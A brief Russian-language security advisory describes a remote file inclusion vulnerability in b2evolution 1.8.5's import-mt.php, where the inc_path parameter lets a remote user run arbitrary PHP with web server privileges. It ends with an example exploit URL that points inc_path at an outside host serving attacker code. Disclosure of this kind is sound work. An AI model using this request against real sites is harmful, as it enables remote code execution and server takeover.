Программа: b2evolution 1.8.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "basepath" сценарием import-mt.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опций "register_globals" и "allow_url_fopen" в конфигурационном файле PHP.
Пример:
http://<victim>/<b2epath>/inc/CONTROL/imports/import-mt.php? basepath=foo&inc_path=https://tiifp.org/tarkus/PoC/
